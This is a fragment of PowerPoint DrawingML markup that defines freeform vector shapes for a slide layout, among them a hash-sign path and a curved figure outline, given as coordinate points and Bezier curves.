                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 218"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 218"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 218"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 218"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 218"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 218"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 160 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 111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7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="2929"/>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2"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Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="2929"/>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Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="292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Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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72"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="292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5"/>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Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="292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Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="2920"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 173 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 201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7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3 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 67 h 209"/>
                  <a:gd name="T46" fmla="*/ 74 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 64 w 179"/>
                  <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 145 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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1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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="208"/>
                      <a:pt x="128" y="208"/>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3"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="198"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="193"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="154"/>
                      <a:pt x="23" y="149"/>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3"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="170"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="184"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="193"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="198"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="203"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="185"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="142"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="144"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="136"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="86"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="67"/>
                      <a:pt x="60" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="57"/>
                      <a:pt x="59" y="50"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="32"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="0"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="118" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="123" y="29"/>
                      <a:pt x="123" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="39"/>
                      <a:pt x="123" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="125" y="61"/>
                      <a:pt x="129" y="74"/>
                      <a:pt x="139" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="160" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="146"/>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="148"/>
                      <a:pt x="154" y="150"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="150" y="156"/>
                      <a:pt x="147" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="160"/>
                      <a:pt x="140" y="160"/>
                      <a:pt x="136" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="158"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="153"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="149"/>
                      <a:pt x="127" y="147"/>
                      <a:pt x="125" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="122" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="170"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="188"/>
                      <a:pt x="122" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="204"/>
                      <a:pt x="137" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="166" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="183"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                      <a:pt x="175" y="180"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="177" y="178"/>
                      <a:pt x="175" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="173" y="174"/>
                      <a:pt x="171" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="172"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="157"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="75" y="73"/>
                      <a:pt x="78" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="89" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="70"/>
                      <a:pt x="95" y="68"/>
                      <a:pt x="98" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="65"/>
                      <a:pt x="101" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="66"/>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="81"/>
                      <a:pt x="74" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="76"/>
                      <a:pt x="70" y="74"/>
                      <a:pt x="68" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="70"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="66" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="72"/>
                      <a:pt x="65" y="74"/>
                      <a:pt x="64" y="76"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="62" y="81"/>
                      <a:pt x="61" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="58" y="88"/>
                      <a:pt x="58" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="59" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="98"/>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="137"/>
                      <a:pt x="46"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0"/>
                      <a:pt x="38" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="127"/>
                      <a:pt x="36" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="137"/>
                      <a:pt x="38" y="140"/>
                      <a:pt x="40" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="149"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="166"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="174"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="65" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="63" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="185"/>
                      <a:pt x="69" y="188"/>
                      <a:pt x="70" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="193"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="197"/>
